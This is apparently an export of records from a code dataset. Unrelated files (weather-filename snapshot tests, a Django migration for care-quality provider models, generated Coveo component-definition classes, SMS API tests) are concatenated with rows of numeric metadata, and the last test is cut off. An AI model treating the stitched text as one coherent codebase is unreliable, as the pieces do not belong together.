| 19.782609 | 74 | 0.660806 | 179 | 1,365 | 4.927374 | 0.139665 | 0.249433 | 0.192744 | 0.283447 | 0.946712 | 0.946712 | 0.909297 | 0.869615 | 0.869615 | 0.821995 | 0 | 0 | 0.272527 | 1,365 | 68 | 75 | 20.073529 | 0.888218 | 0.493773 | 0 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | false | 0 | 0 | 0.25 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 12 |
b7d541eb63fcec7c4978ad3576557046d22ba087 | 3,677 | py | Python | tests/snapshots/snap_test_stations.py | ssuffian/eeweather | 4581714e69839b64a22a5aa9ab682b26631cbb99 | [
"Apache-2.0"
] | 41 | 2018-02-01T22:10:49.000Z | 2022-03-22T17:47:21.000Z | tests/snapshots/snap_test_stations.py | ssuffian/eeweather | 4581714e69839b64a22a5aa9ab682b26631cbb99 | [
"Apache-2.0"
] | 61 | 2018-02-02T14:55:04.000Z | 2022-02-10T19:25:53.000Z | tests/snapshots/snap_test_stations.py | ssuffian/eeweather | 4581714e69839b64a22a5aa9ab682b26631cbb99 | [
"Apache-2.0"
] | 14 | 2018-09-08T05:48:59.000Z | 2022-01-26T20:23:43.000Z | # -*- coding: utf-8 -*-
# snapshottest: v1 - https://goo.gl/zC4yUc
from __future__ import unicode_literals
from snapshottest import Snapshot
snapshots = Snapshot()
snapshots['test_get_isd_filenames_single_year filenames'] = [
'/pub/data/noaa/2007/722860-23119-2007.gz'
]
snapshots['test_get_isd_filenames_multiple_year filenames'] = [
'/pub/data/noaa/2006/722860-23119-2006.gz',
'/pub/data/noaa/2007/722860-23119-2007.gz',
'/pub/data/noaa/2008/722860-23119-2008.gz',
'/pub/data/noaa/2009/722860-23119-2009.gz',
'/pub/data/noaa/2010/722860-23119-2010.gz',
'/pub/data/noaa/2011/722860-23119-2011.gz',
'/pub/data/noaa/2012/722860-23119-2012.gz',
'/pub/data/noaa/2013/722860-23119-2013.gz',
'/pub/data/noaa/2014/722860-23119-2014.gz',
'/pub/data/noaa/2015/722860-23119-2015.gz',
'/pub/data/noaa/2016/722860-23119-2016.gz',
'/pub/data/noaa/2017/722860-23119-2017.gz',
'/pub/data/noaa/2018/722860-23119-2018.gz',
'/pub/data/noaa/2019/722860-23119-2019.gz'
]
snapshots['test_isd_station_get_isd_filenames filenames'] = [
'/pub/data/noaa/2006/722860-23119-2006.gz',
'/pub/data/noaa/2007/722860-23119-2007.gz',
'/pub/data/noaa/2008/722860-23119-2008.gz',
'/pub/data/noaa/2009/722860-23119-2009.gz',
'/pub/data/noaa/2010/722860-23119-2010.gz',
'/pub/data/noaa/2011/722860-23119-2011.gz',
'/pub/data/noaa/2012/722860-23119-2012.gz',
'/pub/data/noaa/2013/722860-23119-2013.gz',
'/pub/data/noaa/2014/722860-23119-2014.gz',
'/pub/data/noaa/2015/722860-23119-2015.gz',
'/pub/data/noaa/2016/722860-23119-2016.gz',
'/pub/data/noaa/2017/722860-23119-2017.gz',
'/pub/data/noaa/2018/722860-23119-2018.gz',
'/pub/data/noaa/2019/722860-23119-2019.gz'
]
snapshots['test_isd_station_get_isd_filenames_with_year filenames'] = [
'/pub/data/noaa/2007/722860-23119-2007.gz'
]
snapshots['test_get_gsod_filenames_single_year filenames'] = [
'/pub/data/gsod/2007/722860-23119-2007.op.gz'
]
snapshots['test_get_gsod_filenames_multiple_year filenames'] = [
'/pub/data/gsod/2006/722860-23119-2006.op.gz',
'/pub/data/gsod/2007/722860-23119-2007.op.gz',
'/pub/data/gsod/2008/722860-23119-2008.op.gz',
'/pub/data/gsod/2009/722860-23119-2009.op.gz',
'/pub/data/gsod/2010/722860-23119-2010.op.gz',
'/pub/data/gsod/2011/722860-23119-2011.op.gz',
'/pub/data/gsod/2012/722860-23119-2012.op.gz',
'/pub/data/gsod/2013/722860-23119-2013.op.gz',
'/pub/data/gsod/2014/722860-23119-2014.op.gz',
'/pub/data/gsod/2015/722860-23119-2015.op.gz',
'/pub/data/gsod/2016/722860-23119-2016.op.gz',
'/pub/data/gsod/2017/722860-23119-2017.op.gz',
'/pub/data/gsod/2018/722860-23119-2018.op.gz',
'/pub/data/gsod/2019/722860-23119-2019.op.gz'
]
snapshots['test_isd_station_get_gsod_filenames_with_year filenames'] = [
'/pub/data/gsod/2007/722860-23119-2007.op.gz'
]
snapshots['test_isd_station_get_gsod_filenames filenames'] = [
'/pub/data/gsod/2006/722860-23119-2006.op.gz',
'/pub/data/gsod/2007/722860-23119-2007.op.gz',
'/pub/data/gsod/2008/722860-23119-2008.op.gz',
'/pub/data/gsod/2009/722860-23119-2009.op.gz',
'/pub/data/gsod/2010/722860-23119-2010.op.gz',
'/pub/data/gsod/2011/722860-23119-2011.op.gz',
'/pub/data/gsod/2012/722860-23119-2012.op.gz',
'/pub/data/gsod/2013/722860-23119-2013.op.gz',
'/pub/data/gsod/2014/722860-23119-2014.op.gz',
'/pub/data/gsod/2015/722860-23119-2015.op.gz',
'/pub/data/gsod/2016/722860-23119-2016.op.gz',
'/pub/data/gsod/2017/722860-23119-2017.op.gz',
'/pub/data/gsod/2018/722860-23119-2018.op.gz',
'/pub/data/gsod/2019/722860-23119-2019.op.gz'
]
| 39.537634 | 72 | 0.692684 | 598 | 3,677 | 4.177258 | 0.078595 | 0.168135 | 0.18735 | 0.135308 | 0.952762 | 0.943955 | 0.907526 | 0.907526 | 0.907526 | 0.881505 | 0 | 0.34584 | 0.101169 | 3,677 | 92 | 73 | 39.967391 | 0.409985 | 0.016862 | 0 | 0.759494 | 0 | 0 | 0.794574 | 0.772425 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.025316 | 0 | 0.025316 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 12 |
b7dfff035451e0cd9d045d4a86d867cd7bbd7d87 | 141 | py | Python | Titanic/utils/__init__.py | CoupleWinter/Kaggle | cb55a553f68364a9aff693986151f80a49967ec9 | [
"MIT"
] | null | null | null | Titanic/utils/__init__.py | CoupleWinter/Kaggle | cb55a553f68364a9aff693986151f80a49967ec9 | [
"MIT"
] | null | null | null | Titanic/utils/__init__.py | CoupleWinter/Kaggle | cb55a553f68364a9aff693986151f80a49967ec9 | [
"MIT"
] | null | null | null | # coding : utf-8
# Author : Noctis
# Date : 2018-3-18
from Titanic.utils.get_data import GetData
from Titanic.utils.get_data import get_data
| 23.5 | 43 | 0.765957 | 24 | 141 | 4.375 | 0.666667 | 0.2 | 0.304762 | 0.361905 | 0.552381 | 0.552381 | 0 | 0 | 0 | 0 | 0 | 0.066116 | 0.141844 | 141 | 5 | 44 | 28.2 | 0.801653 | 0.333333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
4d079a660cd90cb57767bf02516def43a9f84a01 | 23,855 | py | Python | other_data/migrations/0007_cqcbrand_cqclocation_cqcprovider.py | A-jha383/Charity_backend | 2f985dac9de41af80b593210e74bd1890022a435 | [
"MIT"
] | 1 | 2021-06-10T03:36:22.000Z | 2021-06-10T03:36:22.000Z | other_data/migrations/0007_cqcbrand_cqclocation_cqcprovider.py | A-jha383/Charity_backend | 2f985dac9de41af80b593210e74bd1890022a435 | [
"MIT"
] | null | null | null | other_data/migrations/0007_cqcbrand_cqclocation_cqcprovider.py | A-jha383/Charity_backend | 2f985dac9de41af80b593210e74bd1890022a435 | [
"MIT"
] | null | null | null | # Generated by Django 3.2 on 2021-04-19 11:28
import compositefk.fields
import django.db.models.deletion
from django.db import migrations, models
import ftc.models.orgid
class Migration(migrations.Migration):
dependencies = [
("ftc", "0015_organisationlocation_spider"),
(
"charity",
"0012_alter_ccewcharityareaofoperation_geographic_area_description",
),
("other_data", "0006_auto_20210419_1054"),
]
operations = [
migrations.CreateModel(
name="CQCBrand",
fields=[
("record_id", models.BigAutoField(primary_key=True, serialize=False)),
("id", models.CharField(max_length=255, verbose_name="Brand ID")),
("name", models.CharField(max_length=255, verbose_name="Brand Name")),
(
"spider",
models.CharField(db_index=True, default="cqc", max_length=200),
),
(
"scrape",
models.ForeignKey(
on_delete=django.db.models.deletion.DO_NOTHING, to="ftc.scrape"
),
),
],
),
migrations.CreateModel(
name="CQCProvider",
fields=[
(
"company_number",
models.CharField(
blank=True,
max_length=255,
null=True,
verbose_name="Provider Companies House Number",
),
),
(
"charity_number",
models.CharField(
blank=True,
max_length=255,
null=True,
verbose_name="Provider Charity Number",
),
),
(
"org_id",
ftc.models.orgid.OrgidField(
blank=True,
db_index=True,
max_length=200,
null=True,
verbose_name="Organisation Identifier",
),
),
("record_id", models.BigAutoField(primary_key=True, serialize=False)),
("id", models.CharField(max_length=255, verbose_name="Provider ID")),
(
"name",
models.CharField(max_length=255, verbose_name="Provider Name"),
),
(
"start_date",
models.DateField(
blank=True, null=True, verbose_name="Provider HSCA start date"
),
),
(
"end_date",
models.DateField(
blank=True,
default=None,
null=True,
verbose_name="Provider HSCA End Date",
),
),
(
"status",
models.CharField(
blank=True,
choices=[
("Registered", "Registered"),
("Deregistered (E)", "Deregistered E"),
("Deregistered (V)", "Deregistered V"),
("Dissolved", "Dissolved"),
("Removed", "Removed"),
],
default="Registered",
max_length=255,
null=True,
verbose_name="Provider Status",
),
),
(
"sector",
models.CharField(
blank=True,
choices=[
("Social Care Org", "Social Care"),
("Independent Healthcare Org", "Independent Healthcare"),
("Primary Dental Care", "Primary Dental Care"),
("Primary Medical Services", "Primary Medical Services"),
("Independent Ambulance", "Independent Ambulance"),
(
"NHS Healthcare Organisation",
"Nhs Healthcase Organisation",
),
],
max_length=255,
null=True,
verbose_name="Provider Type/Sector",
),
),
(
"directorate",
models.CharField(
blank=True,
choices=[
("Adult social care", "Adult Social Care"),
("Hospitals", "Hospitals"),
("Primary medical services", "Primary Medical Services"),
("Unspecified", "Unspecified"),
],
max_length=255,
null=True,
verbose_name="Provider Inspection Directorate",
),
),
(
"inspection_category",
models.CharField(
blank=True,
max_length=255,
null=True,
verbose_name="Provider Primary Inspection Category",
),
),
(
"ownership_type",
models.CharField(
blank=True,
choices=[
("Organisation", "Organisation"),
("Individual", "Individual"),
("Partnership", "Partnership"),
("NHS Body", "Nhs Body"),
],
max_length=255,
null=True,
verbose_name="Provider Ownership Type",
),
),
(
"telephone",
models.CharField(
blank=True,
max_length=255,
null=True,
verbose_name="Provider Telephone Number",
),
),
(
"web",
models.URLField(
blank=True,
max_length=255,
null=True,
verbose_name="Provider Web Address",
),
),
(
"address_street",
models.CharField(
blank=True,
max_length=255,
null=True,
verbose_name="Provider Street Address",
),
),
(
"address_2",
models.CharField(
blank=True,
max_length=255,
null=True,
verbose_name="Provider Address Line 2",
),
),
(
"address_city",
models.CharField(
blank=True,
max_length=255,
null=True,
verbose_name="Provider City",
),
),
(
"address_county",
models.CharField(
blank=True,
max_length=255,
null=True,
verbose_name="Provider County",
),
),
(
"address_postcode",
models.CharField(
blank=True,
max_length=255,
null=True,
verbose_name="Provider Postal Code",
),
),
(
"geo_uprn",
models.CharField(
blank=True,
max_length=255,
null=True,
verbose_name="Provider PAF / UPRN ID",
),
),
(
"geo_local_authority",
models.CharField(
blank=True,
max_length=255,
null=True,
verbose_name="Provider Local Authority",
),
),
(
"geo_region",
models.CharField(
blank=True,
max_length=255,
null=True,
verbose_name="Provider Region",
),
),
(
"geo_latitude",
models.FloatField(
blank=True, null=True, verbose_name="Provider Latitude"
),
),
(
"geo_longitude",
models.FloatField(
blank=True, null=True, verbose_name="Provider Longitude"
),
),
(
"geo_pcon",
models.CharField(
blank=True,
max_length=255,
null=True,
verbose_name="Provider Parliamentary Constituency",
),
),
(
"spider",
models.CharField(db_index=True, default="cqc", max_length=200),
),
(
"brand_id",
models.CharField(
blank=True, db_index=True, max_length=255, null=True
),
),
(
"brand",
compositefk.fields.CompositeForeignKey(
blank=True,
null=True,
null_if_equal=[],
on_delete=django.db.models.deletion.DO_NOTHING,
to="other_data.cqcbrand",
to_fields={
"id": compositefk.fields.LocalFieldValue("brand_id"),
"scrape_id": compositefk.fields.LocalFieldValue(
"scrape_id"
),
},
),
),
(
"scrape",
models.ForeignKey(
on_delete=django.db.models.deletion.DO_NOTHING, to="ftc.scrape"
),
),
],
),
migrations.CreateModel(
name="CQCLocation",
fields=[
("record_id", models.BigAutoField(primary_key=True, serialize=False)),
("id", models.CharField(max_length=255, verbose_name="Location ID")),
(
"start_date",
models.DateField(
blank=True, null=True, verbose_name="Location HSCA start date"
),
),
(
"end_date",
models.DateField(
blank=True,
default=None,
null=True,
verbose_name="Location HSCA End Date",
),
),
(
"status",
models.CharField(
blank=True,
choices=[
("Active", "Active"),
("Inactive-Dereg", "Inactive"),
("Removed", "Removed"),
],
default="Active",
max_length=255,
null=True,
verbose_name="Location Status",
),
),
(
"care_home",
models.BooleanField(
blank=True, null=True, verbose_name="Care home?"
),
),
(
"name",
models.CharField(max_length=255, verbose_name="Location Name"),
),
(
"ods_code",
models.CharField(
blank=True,
max_length=255,
null=True,
verbose_name="Location ODS Code",
),
),
(
"telephone",
models.CharField(
blank=True,
max_length=255,
null=True,
verbose_name="Location Telephone Number",
),
),
(
"web",
models.URLField(
blank=True,
max_length=255,
null=True,
verbose_name="Location Web Address",
),
),
(
"care_home_beds",
models.IntegerField(
blank=True, null=True, verbose_name="Care homes beds"
),
),
(
"sector",
models.CharField(
blank=True,
choices=[
("Social Care Org", "Social Care"),
("Independent Healthcare Org", "Independent Healthcare"),
("Primary Dental Care", "Primary Dental Care"),
("Primary Medical Services", "Primary Medical Services"),
("Independent Ambulance", "Independent Ambulance"),
(
"NHS Healthcare Organisation",
"Nhs Healthcase Organisation",
),
],
max_length=255,
null=True,
verbose_name="Location Type/Sector",
),
),
(
"directorate",
models.CharField(
blank=True,
choices=[
("Adult social care", "Adult Social Care"),
("Hospitals", "Hospitals"),
("Primary medical services", "Primary Medical Services"),
("Unspecified", "Unspecified"),
],
max_length=255,
null=True,
verbose_name="Location Inspection Directorate",
),
),
(
"inspection_category",
models.CharField(
blank=True,
max_length=255,
null=True,
verbose_name="Location Primary Inspection Category",
),
),
(
"latest_overall_rating",
models.CharField(
blank=True,
choices=[
("Inadequate", "Inadequate"),
("Requires improvement", "Requires Improvement"),
("Good", "Good"),
("Outstanding", "Outstanding"),
],
max_length=255,
null=True,
verbose_name="Location Latest Overall Rating",
),
),
(
"publication_date",
models.DateField(
blank=True, null=True, verbose_name="Publication Date"
),
),
(
"inherited_rating",
models.BooleanField(
blank=True, null=True, verbose_name="Inherited Rating (Y/N)"
),
),
(
"geo_region",
models.CharField(
blank=True,
max_length=255,
null=True,
verbose_name="Location Region",
),
),
(
"geo_local_authority",
models.CharField(
blank=True,
max_length=255,
null=True,
verbose_name="Location Local Authority",
),
),
(
"geo_onspd_ccg_code",
models.CharField(
blank=True,
max_length=255,
null=True,
verbose_name="Location ONSPD CCG Code",
),
),
(
"geo_onspd_ccg",
models.CharField(
blank=True,
max_length=255,
null=True,
verbose_name="Location ONSPD CCG",
),
),
(
"geo_commissioning_ccg_code",
models.CharField(
blank=True,
max_length=255,
null=True,
verbose_name="Location Commissioning CCG Code",
),
),
(
"geo_commissioning_ccg",
models.CharField(
blank=True,
max_length=255,
null=True,
verbose_name="Location Commissioning CCG",
),
),
(
"address_street",
models.CharField(
blank=True,
max_length=255,
null=True,
verbose_name="Location Street Address",
),
),
(
"address_2",
models.CharField(
blank=True,
max_length=255,
null=True,
verbose_name="Location Address Line 2",
),
),
(
"address_city",
models.CharField(
blank=True,
max_length=255,
null=True,
verbose_name="Location City",
),
),
(
"address_county",
models.CharField(
blank=True,
max_length=255,
null=True,
verbose_name="Location County",
),
),
(
"address_postcode",
models.CharField(
blank=True,
max_length=255,
null=True,
verbose_name="Location Postal Code",
),
),
(
"geo_uprn",
models.CharField(
blank=True,
max_length=255,
null=True,
verbose_name="Location PAF / UPRN ID",
),
),
(
"geo_latitude",
models.FloatField(
blank=True, null=True, verbose_name="Location Latitude"
),
),
(
"geo_longitude",
models.FloatField(
blank=True, null=True, verbose_name="Location Longitude"
),
),
(
"geo_pcon",
models.CharField(
blank=True,
max_length=255,
null=True,
verbose_name="Location Parliamentary Constituency",
),
),
(
"spider",
models.CharField(db_index=True, default="cqc", max_length=200),
),
(
"provider_id",
models.CharField(
blank=True, db_index=True, max_length=255, null=True
),
),
(
"classification",
models.ManyToManyField(to="charity.VocabularyEntries"),
),
(
"provider",
compositefk.fields.CompositeForeignKey(
blank=True,
null=True,
null_if_equal=[],
on_delete=django.db.models.deletion.DO_NOTHING,
related_name="locations",
to="other_data.cqcprovider",
to_fields={
"id": compositefk.fields.LocalFieldValue("provider_id"),
"scrape_id": compositefk.fields.LocalFieldValue(
"scrape_id"
),
},
),
),
(
"scrape",
models.ForeignKey(
on_delete=django.db.models.deletion.DO_NOTHING, to="ftc.scrape"
),
),
],
),
]
| 37.805071 | 88 | 0.32052 | 1,296 | 23,855 | 5.736883 | 0.134259 | 0.08581 | 0.104909 | 0.132885 | 0.811163 | 0.802824 | 0.789375 | 0.77848 | 0.729523 | 0.69388 | 0 | 0.02057 | 0.602599 | 23,855 | 630 | 89 | 37.865079 | 0.763713 | 0.001803 | 0 | 0.696629 | 1 | 0 | 0.147023 | 0.010138 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.006421 | 0 | 0.011236 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
4d5cf0a3f0dbd18c37ed6753b5fd3d556a9a8290 | 7,795 | py | Python | generators/simple/templates/src/platform/extensionRunner/cdf/component_definition.py | jfallaire/generator-ps-boilerplate-project | 36f544a54442c191430451715425da98ea76a63e | [
"MIT"
] | 2 | 2019-07-24T16:00:51.000Z | 2019-10-03T18:36:20.000Z | generators/simple/templates/src/platform/extensionRunner/cdf/component_definition.py | jfallaire/generator-ps-boilerplate-project | 36f544a54442c191430451715425da98ea76a63e | [
"MIT"
] | 19 | 2019-06-20T21:58:44.000Z | 2020-11-05T13:48:42.000Z | generators/simple/templates/src/platform/extensionRunner/cdf/component_definition.py | jfallaire/generator-ps-boilerplate-project | 36f544a54442c191430451715425da98ea76a63e | [
"MIT"
] | 1 | 2019-06-22T17:30:42.000Z | 2019-06-22T17:30:42.000Z | """
- THIS FILE IS GENERATED -
dependencies/CDF/CDFComponentDefinition.jid
"""
from attr import attrs
from typing import Dict, List, Optional as Opt
from .root import JidType
@attrs(kw_only=True, auto_attribs=True)
class Parameter(JidType, hint="Coveo.Cdf.Component.Parameter"):
"""A structure that represents a configuration parameter.
Attributes:
name: The name of the parameter, for display.
default_value: The default value of the parameter.
tag: The tag used to identify the parameter within the files. In the files, each tag must be enclosed in double-percent signs (e.g.: %%myTag%%).
"""
name: Opt[str] = None
default_value: Opt[str] = None
tag: Opt[str] = None
def __init__(self, *, name: Opt[str] = None, default_value: Opt[str] = None, tag: Opt[str] = None) -> None:
"""
Parameters:
name: The name of the parameter, for display.
default_value: The default value of the parameter.
tag: The tag used to identify the parameter within the files. In the files, each tag must be enclosed in double-percent signs (e.g.: %%myTag%%).
"""
@attrs(kw_only=True, auto_attribs=True)
class ParametersDefinition(JidType, hint="Coveo.Cdf.Component.ParametersDefinition"):
"""A structure that represents configuration parameters and the text files in which they appear.
Attributes:
files: A list of text files to search for parameter tags.
parameters: The list of configuration parameters to apply.
"""
files: Opt[List[str]] = None
parameters: Opt[List[Parameter]] = None
def __init__(self, *, files: Opt[List[str]] = None, parameters: Opt[List[Parameter]] = None) -> None:
"""
Parameters:
files: A list of text files to search for parameter tags.
parameters: The list of configuration parameters to apply.
"""
@attrs(kw_only=True, auto_attribs=True)
class InstanceDefinition(JidType, hint="Coveo.Cdf.Component.InstanceDefinition"):
"""A structure that represents an instance template.
Attributes:
type_name: The name of the instance template. Used as Id, unique per component.
description: The description of the instance template.
package_file_name: The filename of the instance package to use within the component package.
install_command: A command to execute each time an instance of this type is created on an agent.
uninstall_command: A command to execute each time an instance of this type is removed from an agent.
parameters_definition: A list of configuration parameters.
executable_path: The command to execute. Path must be relative to the root of the archive.
command_parameters: The command line parameters to use when launching the executable.
is_node_process: Indicates if the instance is a 'Node Process'.
"""
type_name: Opt[str] = None
description: Opt[str] = None
package_file_name: Opt[str] = None
install_command: Opt[str] = None
uninstall_command: Opt[str] = None
parameters_definition: Opt[ParametersDefinition] = None
executable_path: Opt[str] = None
command_parameters: Opt[str] = None
is_node_process: Opt[bool] = None
def __init__(
self,
*,
type_name: Opt[str] = None,
description: Opt[str] = None,
package_file_name: Opt[str] = None,
install_command: Opt[str] = None,
uninstall_command: Opt[str] = None,
parameters_definition: Opt[ParametersDefinition] = None,
executable_path: Opt[str] = None,
command_parameters: Opt[str] = None,
is_node_process: Opt[bool] = None,
) -> None:
"""
Parameters:
type_name: The name of the instance template. Used as Id, unique per component.
description: The description of the instance template.
package_file_name: The filename of the instance package to use within the component package.
install_command: A command to execute each time an instance of this type is created on an agent.
uninstall_command: A command to execute each time an instance of this type is removed from an agent.
parameters_definition: A list of configuration parameters.
executable_path: The command to execute. Path must be relative to the root of the archive.
command_parameters: The command line parameters to use when launching the executable.
is_node_process: Indicates if the instance is a 'Node Process'.
"""
@attrs(kw_only=True, auto_attribs=True)
class ComponentDefinition(JidType, hint="Coveo.Cdf.Component.ComponentDefinition"):
"""A structure that represents a component package.
Attributes:
name: The name of the component. Components of the same name can coexist if their versions differ.
version: The version of the component. Used as Id, unique per component. Used in conjunction with the component name, the Id becomes unique per node manager and/or agent.
platform: The platform on wich the component can be deployed.
target: The target of the package's binaries.
description: The description of the component.
location: The path to locate the component package.
install_command: A command to execute each time the component package is deployed to an agent.
uninstall_command: A command to execute each time the component package is removed from an agent.
environment: A list of environment variables set specifically for the component.
parameters_definition: A list of configuration parameters.
instances: The list of instance templates defined by this component package.
"""
name: Opt[str] = None
version: Opt[str] = None
platform: Opt[str] = None
target: Opt[str] = None
description: Opt[str] = None
location: Opt[str] = None
install_command: Opt[str] = None
uninstall_command: Opt[str] = None
environment: Opt[Dict[str, str]] = None
parameters_definition: Opt[ParametersDefinition] = None
instances: Opt[List[InstanceDefinition]] = None
def __init__(
self,
*,
name: Opt[str] = None,
version: Opt[str] = None,
platform: Opt[str] = None,
target: Opt[str] = None,
description: Opt[str] = None,
location: Opt[str] = None,
install_command: Opt[str] = None,
uninstall_command: Opt[str] = None,
environment: Opt[Dict[str, str]] = None,
parameters_definition: Opt[ParametersDefinition] = None,
instances: Opt[List[InstanceDefinition]] = None,
) -> None:
"""
Parameters:
name: The name of the component. Components of the same name can coexist if their versions differ.
version: The version of the component. Used as Id, unique per component. Used in conjunction with the component name, the Id becomes unique per node manager and/or agent.
platform: The platform on wich the component can be deployed.
target: The target of the package's binaries.
description: The description of the component.
location: The path to locate the component package.
install_command: A command to execute each time the component package is deployed to an agent.
uninstall_command: A command to execute each time the component package is removed from an agent.
environment: A list of environment variables set specifically for the component.
parameters_definition: A list of configuration parameters.
instances: The list of instance templates defined by this component package.
"""
| 45.319767 | 182 | 0.682104 | 1,017 | 7,795 | 5.149459 | 0.136677 | 0.053466 | 0.068742 | 0.021386 | 0.905098 | 0.874165 | 0.870346 | 0.870346 | 0.834065 | 0.834065 | 0 | 0 | 0.245927 | 7,795 | 171 | 183 | 45.584795 | 0.890949 | 0.585888 | 0 | 0.454545 | 1 | 0 | 0.052765 | 0.052765 | 0 | 0 | 0 | 0 | 0 | 1 | 0.060606 | false | 0 | 0.045455 | 0 | 0.545455 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 8 |
4d7edab9b75fbe564bfe8fbfcd6439cb678b5331 | 117 | py | Python | apps/quality/serializes/__init__.py | kane-zh/MES_server | d8d28768a054eee6433e3900908afd331fd92281 | [
"Apache-2.0"
] | null | null | null | apps/quality/serializes/__init__.py | kane-zh/MES_server | d8d28768a054eee6433e3900908afd331fd92281 | [
"Apache-2.0"
] | null | null | null | apps/quality/serializes/__init__.py | kane-zh/MES_server | d8d28768a054eee6433e3900908afd331fd92281 | [
"Apache-2.0"
] | null | null | null | from apps.quality.serializes.basicinfor_serialize import *
from apps.quality.serializes.recording_serialize import * | 58.5 | 59 | 0.863248 | 14 | 117 | 7.071429 | 0.571429 | 0.161616 | 0.30303 | 0.505051 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.068376 | 117 | 2 | 60 | 58.5 | 0.908257 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
4d93682aee37e87eb8fcda3941187df3b3a3a4f9 | 4,473 | py | Python | server_app/test_cases.py | chaitphani/server_API-worker | 6da5d14696ff1c06f8d8aa322d98c46497a25f87 | [
"MIT"
] | null | null | null | server_app/test_cases.py | chaitphani/server_API-worker | 6da5d14696ff1c06f8d8aa322d98c46497a25f87 | [
"MIT"
] | null | null | null | server_app/test_cases.py | chaitphani/server_API-worker | 6da5d14696ff1c06f8d8aa322d98c46497a25f87 | [
"MIT"
] | null | null | null | from urllib import response
from django.contrib.auth.models import User
from django.test import TestCase
from django.urls import reverse
import mock
from rest_framework.test import APITestCase
from server_app.models import phone_number, account
def login_user():
user = User.objects.create_user("test_user", email="test_user@mail.com", password="test123")
account_obj = account.objects.create(user=user, auth_id='tui7869', username=user.username)
phone_num = phone_number.objects.create(number=1234567890, account=account_obj)
return user, phone_num
class InboundSmsTestCase(APITestCase):
# missing to parameter given 403 error
def test_inbound_with_out_to(self):
url = reverse("api_inbound")
user, phone_num = login_user()
self.client.force_authenticate(user)
response = self.client.post(url, {
"_from": 'this is testing from',
"_text":'Hi this is testing text'
}, format='multipart')
self.assertEqual(403, response.status_code)
# missing to parameter given 403 error
def test_inbound_with_out_from(self):
url = reverse("api_inbound")
user, phone_num = login_user()
self.client.force_authenticate(user)
response = self.client.post(url, {
"_to": 'this is testing to',
"_text":'Hi this is testing text'
}, format='multipart')
self.assertEqual(403, response.status_code)
# missing to parameter given 403 error
def test_inbound_with_out_text(self):
url = reverse("api_inbound")
user, phone_num = login_user()
self.client.force_authenticate(user)
response = self.client.post(url, {
"_from": 'this is testing from',
"_to":'Hi this is testing to'
}, format='multipart')
self.assertEqual(403, response.status_code)
def test_inbound_sms_not_match_to_with_user_num(self):
url = reverse("api_inbound")
user, phone_num = login_user()
self.client.force_authenticate(user)
response = self.client.post(url, {
"_to": 864769,
"_text": "hi this is also testing text",
"_from": "this is testing from",
}, format='json')
self.assertEqual(403, response.status_code)
def test_inbound_sms_stop_in_text(self):
url = reverse("api_inbound")
user, phone_num = login_user()
self.client.force_authenticate(user)
response = self.client.post(url, {
"_to": 864769,
"_text": "hi STOP is also testing text",
"_from": "this is testing from",
}, format='json')
self.assertEqual(403, response.status_code)
class OutboundSmsTestCase(APITestCase):
# missing to parameter given 403 error
def test_outbound_with_out_to(self):
url = reverse("api_outbound")
user, phone_num = login_user()
self.client.force_authenticate(user)
response = self.client.post(url, {
"from": 'this is testing from',
"text":'Hi this is testing text'
}, format='multipart')
self.assertEqual(403, response.status_code)
# missing to parameter given 403 error
def test_outbound_with_out_from(self):
url = reverse("api_outbound")
user, phone_num = login_user()
self.client.force_authenticate(user)
response = self.client.post(url, {
"to": 'this is testing to',
"text":'Hi this is testing text'
}, format='multipart')
self.assertEqual(403, response.status_code)
# missing to parameter given 403 error
def test_outbound_with_out_text(self):
url = reverse("api_outbound")
user, phone_num = login_user()
self.client.force_authenticate(user)
response = self.client.post(url, {
"from": 'this is testing from',
"to":'Hi this is testing to'
}, format='multipart')
self.assertEqual(403, response.status_code)
def test_outbound_sms_not_match_from_with_user_num(self):
url = reverse("api_inbound")
user, phone_num = login_user()
self.client.force_authenticate(user)
response = self.client.post(url, {
"_to": 864769,
"_text": "hi this is also testing text",
"_from": 98876568,
}, format='json')
